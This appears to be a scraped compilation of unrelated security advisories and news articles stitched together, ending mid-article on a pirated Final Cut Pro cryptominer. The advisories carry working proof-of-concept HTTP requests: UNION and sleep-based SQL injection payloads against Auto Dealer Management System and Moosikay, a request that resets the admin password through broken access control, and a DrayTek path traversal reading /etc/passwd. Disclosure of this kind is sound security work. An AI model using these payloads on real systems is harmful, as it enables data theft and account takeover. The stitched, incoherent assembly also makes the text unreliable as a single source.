Auto Dealer Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Auto Dealer Management System - SQL Injection on page view_transaction.php and parameter is id, application url is (?page=vehicles/view_transaction&id=?) with low privilege authentication### Date: > 18 February 2023### CVE Assigned:**[CVE-2023-0912](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0912)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0912) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0912)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> view_transaction.php> On this page id parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: ?page=vehicles/view_transaction&id=*### Description:> The auto dealer management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below+ Admin user has full access to the system + Employee user has only a few menu access i.e. dashboard, car models and vehicle (available and transaction)> Employee could perform the SQL Injection by viewing the vehicle transaction from his/her profile. Therefore, low-privileged users could able to get the access full system.### Proof of Concept:> Following steps are involved:+ An employee view the vehicle transaction and could perform the SQL injection with vulnerable parameter (?page=vehicles/view_transaction&id=5*)### Request:```GET /adms/admin/?page=vehicles/view_transaction&id=5%27+and+false+union+select+1,2,3,4,5,6,7,8,9,database(),version(),12,13,user()--+- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/219882001-6031474c-b28b-4401-b282-6ff470086be3.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT *, concat(firstname,' ',COALESCE(concat(middlename,' '), ''), lastname) as customer from `transaction_list` where id = :id ");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo--------------------------------------------------------------------------# Auto Dealer Management System - SQL Injection on page sell_vehicle.php and parameter is id, application url is (?page=vehicles/sell_vehicle&id=?) with low privilege authentication### Date: > 18 February 2023### CVE Assigned:**[CVE-2023-0913](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0913)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0913) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0913)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> sell_vehicle.php> On this page id parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: ?page=vehicles/sell_vehicle&id=*### Description:> The auto dealer management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below+ Admin user has full access to the system + Employee user has only a few menu access i.e. dashboard, car models and vehicle (available and transaction)> Employee could perform the SQL Injection by opening sell vehicle transaction from his/her profile. Therefore, low-privileged users could able to get the access full system.### Proof of Concept:> Following steps are involved:+ An employee open the sell vehicle transaction form and could perform the SQL injection with vulnerable parameter (?page=vehicles/sell_vehicle&id=1*)### Request:```GET /adms/admin/?page=vehicles/sell_vehicle&id=1%27+and+false+union+select+1,2,version(),database(),5,6,user(),@@datadir,9,10,11,12,13--+- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/219883719-cd26586d-694e-49a7-a2ba-deca9445382f.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * from `transaction_list` where id = :id ");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo--------------------------------------------------------------------------# Auto Dealer Management System - SQL Injection on page manage_user.php and parameter is id, application url is (?page=user/manage_user&id=?) with low privilege authentication.### Date: > 18 February 2023### CVE Assigned:**[CVE-2023-0915](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0915)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0915) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0915)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> manage_user.php> On this page id parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: ?page=user/manage_user&id=*### Description:> The auto dealer management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below+ Admin user has full access to the system + Employee user has only a few menu access i.e. dashboard, car models and vehicle (available and transaction)> Although, employee user doesn't have manage_user.php access but due to broken access control, employee could able to perform the SQL Injection by opening manage_user.php page. Therefore, low-privileged users could able to get the access full system.### Proof of Concept:> Following steps are involved:1. Employee guess the page manager_user.php and pass the random id parameter that parameter is vulnerable to SQL injection (?page=user/manage_user&id=1*)### Request:```GET /adms/admin/?page=user/manage_user&id=1%27+and+false+union+select+1,user(),@@datadir,4,database(),6,7,8,9,10,11--+- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/219888637-627e3abb-4b7a-45e6-a22c-3a5c11b75b61.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * FROM users where id = :id ");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo

Auto Dealer Management System 1.0 SQL Injection

With the right kind of exploit, there's hardly any function, app, or bit of data an attacker couldn't access on your Mac, iPad, or iPhone.

A new class of bugs in Apple's iOS, iPadOS, and macOS has been uncovered, researchers say, that could allow an attacker to escalate privileges and make off with everything on a targeted device.

This new class could "allow bypassing code signing to execute arbitrary code in the context of several platform applications," Trellix researcher Austin Emmitt wrote in a blog post on Feb. 21, "leading to escalation of privileges and sandbox escape on both macOS and iOS."

Were an attacker to exploit these vulnerabilities, they could potentially gain access to a victim's photos, messages, call history, location data, and all kinds of other sensitive data, even the device's microphone and camera. They could also use their access to wipe a device altogether.

The vulnerabilities in this class range from medium to high severity, with CVSS ratings between 5.1 and 7.1. Apple grouped them into two CVEs: CVE-2023-23530 and CVE-2023-23531. There's no indication that they've been exploited in the wild.

**NSPredicate: A Fresh Cyberattack Vector**

The cyber failure in this case arises from NSPredicate, a class that enables app developers to filter lists of objects on a device. This "innocent-looking class," as Emmitt put it, is much deeper than it may appear at first glance. "In reality, the syntax of NSPredicate is a full scripting language."

In other words, through NSPredicate, "the ability to dynamically generate and run code on iOS had been an official feature this whole time," he explained.

In one proof-of-concept, Trellix found that an attacker could use NSPredicate to execute code in "coreduetd" or "contextstored," root-level processes that allows entryway into parts of the machine such as the calendar, address book, and photos.

In another case, the researchers found an NSPredicate vulnerability in the UIKitCore framework on the iPad. Here, a malicious app would be able to execute code inside SpringBoard, the app that manages the device's home screen. Getting into SpringBoard could cause any number of compromises to just about any kind of data a user stores on the phone, or allow an attacker to simply erase the device altogether.

The silver lining for this new class of vulnerabilities is that they require an attacker already to have access to a target device. Gaining access is typically the easy part, with methods like phishing and other social engineering being so widely effective, but it also means there are steps anybody can take to harden their defenses.

"Individuals should continue to stay vigilant against social engineering and phishing attacks," McKee says, "while also ensuring they only install applications from a known trusted source. Businesses are encouraged to ensure they are doing the proper product security testing on any third-party applications they use in their infrastructure and are monitoring device logs for any suspicious or unusual activity."

**Patching Might Not Be the End of the Story**

If they haven't already, Apple users should update their system software, as the newest versions include fixes for the vulnerabilities so described. That doesn't mean, however, that vulnerabilities of this kind won't pop up again.

Emmitt highlighted in the blog post how NSPredicate had already been exposed by a security researcher back in 2019, then exploited by NSO Group in 2021, in an espionage attack targeting a Saudi activist. Apple attempted to close the hole but evidently didn't finish the job, paving the way for the new discoveries.

"Elimination of a bug class is often extremely difficult to accomplish as it often requires not only code changes but education of developers," explains Doug McKee, director of vulnerability research for Trellix. "Like all bug classes, unless a mitigation is put into place which would eliminate the entire class, it would be expected that more similar vulnerabilities would be found in the future."

**The Myth of Apple’s Superior Security?**

The findings are another puncture wound in the perception that Apple devices are somehow inherently more secure than PCs or Android devices.

"Since the first version of iOS on the original iPhone," Emmitt explained, "Apple has enforced careful restrictions on the software that can run on their mobile devices."

The devices do this with code signing. Functioning somewhat like a bouncer at a club, iPhone only allows an application to run if it has been cryptographically signed by a trusted developer. If any entity — a developer, hacker, etc. — wishes to run code on the machine, but they're not "on the list," they'll be shut out. And "as macOS has continually adopted more features of iOS," Emmitt noted, "it has also come to enforce code signing more strictly."

As a result of its strict policies, Apple has earned a reputation in some corners for being particularly cyber secure. Yet that extra stringency can only extend so far.

"I think that there is a misconception when it comes to Apple devices," says Mike Burch, director of application security for Security Journey. "The assumption by the public is that they are more secure than other systems. It is true that Apple has many security features and is more stringent about what applications it allows on its devices. Still, they are just as susceptible to vulnerabilities being introduced to their devices as any other provider."

'New Class of Bugs' in Apple Devices Opens the Door to Complete Takeover

Auto Dealer Management System version 1.0 suffers from a privilege escalation vulnerability due to a broken access control where a lower privileged user's cookie can be leveraged to takeover an administrative account.

# Auto Dealer Management System - Broken Access Control leads to compromise of all application accounts by accessing the ?page=user/list with low privileged user account

### Date:   
> 18 February 2023  
### Author Email:   
> navaidnasari@hotmail.co.uk  
### Vendor Homepage:  
> https://www.sourcecodester.com  
### Software Link:  
> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)  
### Version:  
> v 1.0  
### Broken Authentication:  
> Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review.

### Affected Page:  
> list.php , manage_user.php

> On these page, application isn't verifying the authorization mechanism. Due to that, all the parameters are vulnerable to broken access control and low privilege user could view the list of user's and change any user password to access it.

### Description:  
> Broken access control allows low privilege attacker to change password of all application users

### Proof of Concept:  
> Following steps are involved:  
1. Visit the vulnerable page: ?page=user/list  
2. Click on Action and Edit the password of Admin

![image](https://user-images.githubusercontent.com/123810418/219884701-0f1feb4f-6c8a-4299-b510-1762461910ee.png)

4. Update the Password and Submit

5. Request:  
```  
POST /adms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
Content-Length: 877  
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfODLB5j55MvB5pGU  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36  
sec-ch-ua-platform: "Windows"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/adms/admin/?page=user/manage_user&id=1  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5  
Connection: close

------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="id"

1  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="firstname"

Adminstrator  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="middlename"

------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="lastname"

Admin  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="username"

admin  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="password"

admin123  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="type"

1  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundaryfODLB5j55MvB5pGU--

```  
6. Successful exploit screenshots are below (without cookie parameter)  
![image](https://user-images.githubusercontent.com/123810418/219884923-5283fca6-d509-4c48-9db0-f61ea6dbb352.png)

7. Vulnerable Code Snippets:

![image](https://user-images.githubusercontent.com/123810418/219884994-e74d7d48-4d45-4135-9a38-45e26c65434b.png)

![image](https://user-images.githubusercontent.com/123810418/219885023-a76afbe0-88f0-4aaa-89cd-1e541e511427.png)

### Recommendation:  
> Whoever uses this CMS, should update the authorization mechanism on top of the  list.php , manage_user.php pages as per requirement to avoid a Broken Access Control attack

Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo

Auto Dealer Management System 1.0 Privilege Escalation

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

Jessica Haworth 24 February 2023 at 13:09 UTC  
Updated: 24 February 2023 at 13:15 UTC

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

  

Twitter faced further criticism this week when Elon Musk’s social networking platform announced SMS-based 2FA will only be available to paying customers going forward.

The social media site historically enabled two-factor authentication (2FA) to all users, providing they connected their mobile phone number to their account.

This week, however, users were warned that this security option would no longer be available to users who did not pay for verification.

Of course, this sparked huge backlash online, particularly among the majority of those with non-paid accounts.

It’s worth noting, though, that users can still use 2FA with third-party authentication apps such as Google Authenticate.

Want the latest web security news straight to your inbox? Sign up to our newsletter here

Elsewhere, web hosting provider GoDaddy announced it had fallen victim to a cyber-attack… and this was part of a campaign lasting almost three years.

The company announced in a statement that it had evidence of an intrusion that took place back in December 2022, when “a small number of customers” complained about their websites being intermittently redirected.

In a filing to the US Securities and Exchange Commission (PDF), the American domain registrar also divulged that it had evidence this attack was linked to an earlier incident in March 2020, when an attacker “compromised the hosting login credentials of approximately 28,000 hosting customers to their hosting accounts as well as the login credentials of a small number of our personnel”.

GoDaddy says it believes these attacks, together with a 2021 compromise of its hosted WordPress service, “are part of a multi-year campaign by a sophisticated threat actor group”.

BACKGROUND Truffle Security relaunches XSS Hunter tool with new features

Finally, the maintainers of newly resurfaced tool XSS Hunter announced the introduction of optional end-to-end (e2e) encryption to its fork after a backlash from privacy-conscious users.

Truffle Security, which launched a new fork of the open source utility after its deprecation by original creator Matthew Bryant, were criticized earlier this month for inspecting potentially sensitive data generated by users after they shared anonymized statistics about the vulnerabilities unearthed.

As reported by The Daily Swig, users have now been reassured that e2e encryption has been added to the fork in a statement given by Truffle Security’s founder.

We also recently reported that Belgium has become the first European country to adopt a national, comprehensive safe harbor framework for ethical hackers, and how Frans Rosén topped PortSwigger’s top 10 web hacking techniques of 2022 with his research ‘Account hijacking using dirty dancing in sign-in OAuth-flows’.

You can catch up with the full range of our recent news coverage by visiting The Daily Swig’s homepage.

Here are some more web security stories and other cybersecurity news that caught our attention in the last fortnight:

**Web vulnerabilities**

*   FortiNAC / Critical / Unauthenticated RCE / An external control of file name or path in certain Fortinet FortiNAC versions allow attackers to execute unauthorized code / Patched and disclosed February 16
*   Node.js / Medium / CLRF injection / The fetch API in Node.js did not prevent CRLF injection in the host header potentially allowing attacks such as HTTP response splitting and HTTP header injection / Patched and disclosed February 16
*   Node.js / High / Permissions policies bypass / Non-authorized modules potentially accessible via / Patched and disclosed February 16
*   Kardex MLOG / Severity TBC / RCE / SSTI to RCE due to sanitization issue on industrial web interface / Patched January 24, disclosed February 7
*   Apache Kerby / LDAP injection / Vulnerability exists in / Patched and disclosed February 20

**Research and attack techniques**

*   PortSwigger’s\* Gareth Heyes demonstrated how to detect server-side prototype pollution without causing denial-of-service at AppSec Dublin conference earlier this month.
*   Researchers from CyberXplore detailed how they hacked GitHub for a whole month, resulting in the finding of six vulnerabilities, which are detailed in this blog post.
*   Software engineer Matt Frisbie built a purposely-malicious Google Chrome extension that steals as much data as possible to demonstrate what users could expose themselves to if they aren’t careful with what they install.

A security researcher has praised the merits of hacking on Apple’s bug bounty program

**Bug bounty/vulnerability disclosure**

*   A write-up from security researcher Omar Hashem, who fully took over a HubSpot account, details his failures on the path to exploitation. Research is inherently about trial and error, yet few write ups shared online talk about the things that didn’t work.
*   A researcher calling themselves ‘infiltrateops’ shared details on how they were awarded a decent payout from Apple and lauded the response from its security team.
*   Google released a review of all of the bugs found in its vulnerability reward program in 2022, revealing it fixed more than 2,900 issues in that year alone.

**New open source security tools**

*   Legitify, a tool for detecting and remediating security issues across GitHub and GitLab assets, added support for GPT-based misconfiguration scanning.
*   GuardDog, a tool used to identify malicious Python packages using Semgrep and package metadata analysis, has been updated to provide npm support, new heuristics, and easier CI integration.

\*PortSwigger is the parent company of The Daily Swig.

PREVIOUS EDITION Deserialized web security roundup: KeePass dismisses ‘vulnerability’ report, OpenSSL gets patched, and Reddit admits phishing hack

Deserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption

A vulnerability classified as problematic has been found in DrayTek Vigor 2960 1.5.1.4. Affected is the function sub_1DF14 of the file /cgi-bin/mainfunction.cgi. The manipulation of the argument option with the input /../etc/password leads to path traversal. The attack needs to be done within the local network. The exploit has been disclosed to the public and may be used. VDB-221742 is the identifier assigned to this vulnerability.

It doesn’t filter the var option, so we can use /../to read arbitrary file.

    POST /cgi-bin/mainfunction.cgi HTTP/1.1
    Host: xxxxxxxx
    Content-Length: 61
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Origin: xxxxxxxx
    Referer: xxxxxxxxxx
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: SESSION_ID_VIGOR=7:26EB81E4EA6DC603661320EBD1C938DC
    Connection: close
    
    action=doCfgExport&option=/../etc/passwd-&rtick=1663484341535

CVE-2023-1009: Vuln/1.md at main · xxy1126/Vuln

An investigation into data safety labels for Android apps available on the Google Play Store has uncovered "serious loopholes" that allow apps to provide misleading or outright false information.
The study, conducted by the Mozilla Foundation as part of its *Privacy Not Included initiative, compared the privacy policies and labels of the 20 most popular paid apps and the 20 most popular free

An investigation into data safety labels for Android apps available on the Google Play Store has uncovered "serious loopholes" that allow apps to provide misleading or outright false information.

The study, conducted by the Mozilla Foundation as part of its \*Privacy Not Included initiative, compared the privacy policies and labels of the 20 most popular paid apps and the 20 most popular free apps on the app marketplace.

It found that, in roughly 80% of the apps reviewed, "the labels were false or misleading based on discrepancies between the apps' privacy policies and the information apps self-reported on Google's Data safety form."

"The apps aren't self-reporting accurately enough to give the public any meaningful reassurance about the safety and privacy of their data," Mozilla further said, adding consumers are being led to "believe these apps are doing a better job protecting their privacy than they are."

Three of the apps – UC Browser - Safe, Fast, Private; League of Stickman Acti; and Terraria – did not have their Data safety sections filled at all. A mere 6 of the 40 apps received an "OK" grade.

Last year, Google began rolling out a new Data safety section on the Play Store that spells out the apps' privacy and security practices. It's also the company's answer to Apple's app privacy labels that came into effect in December 2020.

However, there are some crucial differences. Apple's labels emphasize on what data is being collected, including those that are collected for tracking purposes as well as information that's linked to the users.

Google's labels, on the other hand, allows developers to provide more context as to why such a data collection may be required and the security principles that are used to safeguard the information.

That said, both systems rely on developers to be transparent about how their apps use data. While Apple has instituted routine checks to ensure that the labels don't provide a false sense of security, Google leaves developers to make "complete and accurate declarations."

Now according to Mozilla, these self-reported labels may not be an accurate representation of an app's data-gathering policies, calling into question the effectiveness of such a framework in enhancing privacy transparency and enabling users to make informed decisions.

"For example, Google exempts apps sharing data with 'service providers' from its disclosure requirements, which is problematic due to both the narrow definition it uses for service providers and the large amount of consumer data involved," Mozilla said.

To that end, Mozilla refutes Snapchat, TikTok and Twitter's claims that their apps don't "share user data with other companies or organizations," stating that the apps' privacy policies explicitly mention sharing user information with advertisers and internet service providers, among others.

It's worth pointing out here that apps can be exempted from disclosing data sharing provided they have sought users' consent, if the data is being shared with a developer's service provider, or if the data is fully anonymized.

The American non-profit is also recommending Apple and Google to adopt a universal nutrition labeling standard, alongside urging the tech giants to "explain their enforcement action against apps that don't comply and take some responsibility for ensuring the accuracy of the information apps report."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Majority of Android Apps on Google Play Store Provide Misleading Data Safety Labels

A vulnerability was found in SourceCodester Moosikay E-Commerce System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Moosikay/order.php of the component POST Parameter Handler. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221732.

Permalink

Cannot retrieve contributors at this time

**Moosikay - E-Commerce System v1.0 has SQL injection**

BUG\_Author:jidle

Website source address:https://www.sourcecodester.com/php/13060/moosikay-e-commerce-system.html

Vulnerability File: /Moosikay/order.php

POST parameter 'username' exists SQL injection vulnerability

Payload1: username=a'&password=b&login=

    POST /Moosikay/order.php HTTP/1.1
    Host: localhost
    Content-Length: 29
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/Moosikay/order.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=8k72voo5t0276k7qbfjgmn7sjm
    Connection: close
    
    username=a'&password=b&login=
    

An error occurred in the sql statement

Payload2: username=a' and (select 1 FROM (select(sleep(10)))a)-- b&password=b&login=

    POST /Moosikay/order.php HTTP/1.1
    Host: localhost
    Content-Length: 74
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/Moosikay/order.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=8k72voo5t0276k7qbfjgmn7sjm
    Connection: close
    
    username=a' and (select 1 FROM (select(sleep(10)))a)-- b&password=b&login=
    

The response time of the server is 10 seconds

CVE-2023-0997: bug_report/SQLi-1.md at main · jidle123/bug_report

The number of people who have made the weaponized software available for sharing via torrent suggests that many unsuspecting victims may have downloaded the XMRig coin miner.

People using pirated versions of Apple's Final Cut Pro video editing software may have gotten more than they bargained for when they downloaded the software from the many illicit torrents through which it is available.

For the past several months at least, an unknown threat actor has used a pirated version of the macOS software to deliver the XMRig cryptocurrency mining tool on systems belonging to people who downloaded the app.

Researchers from Jamf who recently spotted the operation have been unable to determine how many users might have installed the weaponized software on their system and currently have XMRig running on them, but the level of sharing of the software suggests it could be hundreds.

**Potentially Wide Impact for XMRig**

Jaron Bradley, macOS detections expert at Jamf, says his company spotted over 400 seeders — or users who have the complete app — making it available via torrent to those who want it. The security vendor found that the individual who originally uploaded the weaponized version of Final Cut Pro for torrent sharing is someone with a multiyear track record of uploading pirated macOS software with the same cryptominer. Software in which the threat actor had previously sneaked the malware into includes pirated macOS versions of Logic Pro and Adobe Photoshop.

"Given the relatively high number of seeders and \[the fact\] that the malware author has been motivated enough to continuously update and upload the malware over the course of three and a half years, we suspect it has a fairly wide reach," Bradley says.

Jamf described the poisoned Final Cut Pro sample that it discovered as a new and improved version of previous samples of the malware, with obfuscation features that have made it almost invisible to malware scanners on VirusTotal. One key attribute of the malware is its use of the Invisible Internet Project (i2p) protocol for communication. I2p is a private network layer that offers users similar kind of anonymity as that offered by The Onion Router (Tor) network. All i2p traffic exists inside the network, meaning it does not touch the Internet directly.

"The malware author never reaches out to a website located anywhere except within the i2p network," Bradley says. "All attacker tooling is downloaded over the anonymous i2p network and mined currency is sent to the attackers' wallet over i2p as well."

With the pirated version of Final Cut Pro that Jamf discovered, the threat actor had modified the main binary so when a user double clicks the application bundle the main executable is a malware dropper. The dropper is responsible for carrying out all further malicious activity on the system including launching the cryptominer in the background and then displaying the pirated application to the user, Bradley says.

**Continuous Malware Evolution**

As noted, one of the most notable differences between the latest version of the malware and previous versions is its increased stealth — but this has been a pattern. 

The earliest version — bundled into pirated macOS software back in 2019 — was the least stealthy and mined cryptocurrency all the time whether the user was at the computer or not. This made it easy to spot. A later iteration of the malware got sneakier; it would only start mining cryptocurrency when the user opened a pirated software program. 

